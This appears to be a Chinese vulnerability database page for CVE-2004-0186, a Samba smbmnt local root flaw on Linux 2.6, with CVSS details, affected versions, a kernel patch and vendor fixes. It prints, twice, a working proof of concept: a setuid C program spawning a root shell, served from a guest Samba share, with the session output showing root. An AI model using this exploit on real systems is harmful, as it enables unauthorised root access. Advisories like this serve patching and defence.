CVE-2004-0186
CVSS7.2
发布时间 :2004-03-15 00:00:00
修订时间 :2016-10-17 22:41:35
NMCOES    

[原文]smbmnt in Samba 2.x and 3.x on Linux 2.6, when installed setuid, allows local users to gain root privileges by mounting a Samba share that contains a setuid root program, whose setuid attributes are not cleared when the share is mounted.


[CNNVD]Linux Kernel Samba共享本地权限提升漏洞(CNNVD-200403-077)

        
        Linux Kernel Samba是用于共享的应用系统。
        当执行远程Samba共享系统上的文件时没有进行充分完整性检查,本地攻击者可以利用这个漏洞提升权限。
        问题存在于smbmnt中,当安装Samba事,部分Linux系统以SETUID ROOT属性安装,由于执行共享系统上的文件时缺少充分完整检查,任何拥有本地帐户的攻击者如果他们可以设置一个Samba服务器并能从目标机器上挂接,就可能获得root用户权限。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:samba:samba:3.0.0Samba 3.0.0
cpe:/o:linux:linux_kernel:2.6.0:test11Linux Kernel 2.6 test11
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.0:test1Linux Kernel 2.6 test1
cpe:/o:linux:linux_kernel:2.6.0:test10Linux Kernel 2.6 test10
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.0:test4Linux Kernel 2.6 test4
cpe:/o:linux:linux_kernel:2.6.0:test5Linux Kernel 2.6 test5
cpe:/a:samba:samba:2.0Samba Samba 2.0
cpe:/o:linux:linux_kernel:2.6.0:test2Linux Kernel 2.6 test2
cpe:/o:linux:linux_kernel:2.6.0:test3Linux Kernel 2.6 test3
cpe:/o:linux:linux_kernel:2.6.0:test8Linux Kernel 2.6 test8
cpe:/o:linux:linux_kernel:2.6.0:test9Linux Kernel 2.6 test9
cpe:/o:linux:linux_kernel:2.6.0:test6Linux Kernel 2.6 test6
cpe:/o:linux:linux_kernel:2.6.0:test7Linux Kernel 2.6 test7
cpe:/o:linux:linux_kernel:2.6_test9_cvs
cpe:/o:linux:linux_kernel:2.6.0Linux Kernel 2.6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0186
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0186
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-077
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107636290906296&w=2
(UNKNOWN)  BUGTRAQ  20040209 Samba 3.x + kernel 2.6.x local root vulnerability
http://marc.info/?l=bugtraq&m=107657505718743&w=2
(UNKNOWN)  BUGTRAQ  20040211 Re: Samba 3.x + kernel 2.6.x local root vulnerability
http://www.debian.org/security/2004/dsa-463
(VENDOR_ADVISORY)  DEBIAN  DSA-463
http://www.securityfocus.com/bid/9619
(VENDOR_ADVISORY)  BID  9619
http://xforce.iss.net/xforce/xfdb/15131
(VENDOR_ADVISORY)  XF  samba-smbmnt-gain-privileges(15131)

- 漏洞信息

Linux Kernel Samba共享本地权限提升漏洞
高危 访问验证错误
2004-03-15 00:00:00 2005-05-13 00:00:00
本地  
        
        Linux Kernel Samba是用于共享的应用系统。
        当执行远程Samba共享系统上的文件时没有进行充分完整性检查,本地攻击者可以利用这个漏洞提升权限。
        问题存在于smbmnt中,当安装Samba事,部分Linux系统以SETUID ROOT属性安装,由于执行共享系统上的文件时缺少充分完整检查,任何拥有本地帐户的攻击者如果他们可以设置一个Samba服务器并能从目标机器上挂接,就可能获得root用户权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 以下是Urban Widmark提供的没经过测试的针对2.6.3-rc1 Kernel的补丁:
        diff -urN -X exclude linux-2.6.3-rc1-orig/fs/smbfs/proc.c linux-2.6.3-rc1-smbfs/fs/smbfs/proc.c
        - --- linux-2.6.3-rc1-orig/fs/smbfs/proc.c Mon Feb 9 19:08:39 2004
        +++ linux-2.6.3-rc1-smbfs/fs/smbfs/proc.c Mon Feb 9 21:43:08 2004
        @@ -546,7 +546,8 @@
        #define MAX_FILE_MODE 6
        static mode_t file_mode[] = {
        - - S_IFREG, S_IFDIR, S_IFLNK, S_IFCHR, S_IFBLK, S_IFIFO, S_IFSOCK
        + S_IFREG, S_IFDIR, S_IFLNK, S_IFREG /* S_IFCHR */, S_IFREG /* S_IFBLK */,
        + S_IFIFO, S_IFSOCK
        };
        static int smb_filetype_to_mode(u32 filetype)
        @@ -567,9 +568,9 @@
        if (mode & S_IFLNK)
        return UNIX_TYPE_SYMLINK;
        if (mode & S_IFCHR)
        - - return UNIX_TYPE_CHARDEV;
        + return UNIX_TYPE_FILE /* UNIX_TYPE_CHARDEV */ ;
        if (mode & S_IFBLK)
        - - return UNIX_TYPE_BLKDEV;
        + return UNIX_TYPE_FILE /* UNIX_TYPE_BLKDEV */ ;
        if (mode & S_IFIFO)
        return UNIX_TYPE_FIFO;
        if (mode & S_IFSOCK)
        @@ -1834,6 +1835,7 @@
        static void
        smb_finish_dirent(struct smb_sb_info *server, struct smb_fattr *fattr)
        {
        + fattr->f_mode &= ~(S_ISGID | S_ISUID);
        if (fattr->f_unix)
        return;
        厂商补丁:
        Linux
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.kernel.org/

- 漏洞信息 (23674)

Linux Kernel Samba 2.2.8 Share Local Privilege Elevation Vulnerability (EDBID:23674)
linux local
2004-02-09 Verified
0 Martin Fiala
N/A [点击下载]
source: http://www.securityfocus.com/bid/9619/info

A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel.

The issue appears to exist due to a lack of sufficient sanity checks performed when executing a file that is hosted on a remote Samba share. An attacker may exploit this condition to gain elevated privileges, as the setuid/setgid bit of a remote file is honored on the local system.

misko@slovakia:~$ smbmount --version
Usage: mount.smbfs service mountpoint [-n] [-o options,...]
Version 3.0.1-Debian

misko@slovakia:~$ ls -l /usr/bin/smbmount
- - -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount
misko@slovakia:~$ ls -l /usr/bin/smbmnt
- - -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt
^

Confirmed to be default on Debian and Mandrake.

share:/data/share# cat a.c
main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

share:/data/share# make a
cc a.c -o a
share:/data/share# chmod +s a
share:/data/share#

share:/etc/samba/smb.conf

[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share

share:/data/share# ls -l a
- - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a

misko@slovakia:~$ ls -l pokus/a
- - -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a
misko@slovakia:~$ pokus/a
root@slovakia:~# id
uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333)
root@slovakia:~#		

- 漏洞信息

3916
Samba smbmnt Local Privilege Escalation
Local Access Required Misconfiguration
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Samba contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when smbmnt is setuid root, and the permissions are not strippped. This flaw may lead to a loss of confidentiality, integrity and/or availability.

- 时间线

2004-02-09 2004-02-09
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Remove the setuid bit from "smbmnt"

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux Kernel Samba Share Local Privilege Elevation Vulnerability
Access Validation Error 9619
No Yes
2004-02-09 12:00:00 2009-07-12 02:06:00
Discovery of this vulnerability has been credited to Martin Fiala <digri@dik.cvut.cz>

- 受影响的程序版本

Samba Samba 2.2.8 a
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.2
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
Samba Samba 2.2.7 a
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 8.0
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 9.0 i386
+ RedHat Linux 9.0 i386
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
+ Slackware Linux 8.1
+ Slackware Linux 8.1
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
Samba Samba 2.2.3 a
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
Samba Samba 2.2.3 a
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
Mandriva Linux Mandrake 9.2 amd64
Mandriva Linux Mandrake 9.2
Mandriva Linux Mandrake 9.1 ppc
Mandriva Linux Mandrake 9.1
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4

- 漏洞讨论

A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel.

The issue appears to exist due to a lack of sufficient sanity checks performed when executing a file that is hosted on a remote Samba share. An attacker may exploit this condition to gain elevated privileges, as the setuid/setgid bit of a remote file is honored on the local system.

- 漏洞利用

The following example has been supplied:
"share" - smb server
"slovakia" - smb client

misko@slovakia:~$ smbmount --version
Usage: mount.smbfs service mountpoint [-n] [-o options,...]
Version 3.0.1-Debian

misko@slovakia:~$ ls -l /usr/bin/smbmount
- - -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount
misko@slovakia:~$ ls -l /usr/bin/smbmnt
- - -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt
^

Confirmed to be default on Debian and Mandrake.

share:/data/share# cat a.c
main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

share:/data/share# make a
cc a.c -o a
share:/data/share# chmod +s a
share:/data/share#

share:/etc/samba/smb.conf

[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share

share:/data/share# ls -l a
- - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a

misko@slovakia:~$ ls -l pokus/a
- - -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a
misko@slovakia:~$ pokus/a
root@slovakia:~# id
uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333)
root@slovakia:~#

- 解决方案

Gentoo have released an advisory (GLSA 200404-21) and have made an updated eBuild available to address this issue. Gentoo have recommended that users run the following commands to merge the fixed eBuild:
# emerge sync
# emerge -pv ">=net-fs/samba-3.0.2a-r2"
# emerge ">=net-fs/samba-3.0.2a-r2"

Those using Samba's password database also need to run the following command:
# pdbedit --force-initialized-passwords

Debian has released an advisory (DSA 463-1) and fixes to address this issue. See the referenced advisory for links to fixed packages.

Mandrake has released an advisory MDKSA-2004:035 and fixes to address this issue. See the referenced advisory for links to fixed packages.

TurboLinux has released advisory TLSA-2004-25 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.


Samba Samba 2.2.3 a

Samba Samba 2.2.3 a

Samba Samba 2.2.7 a

Samba Samba 2.2.8 a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站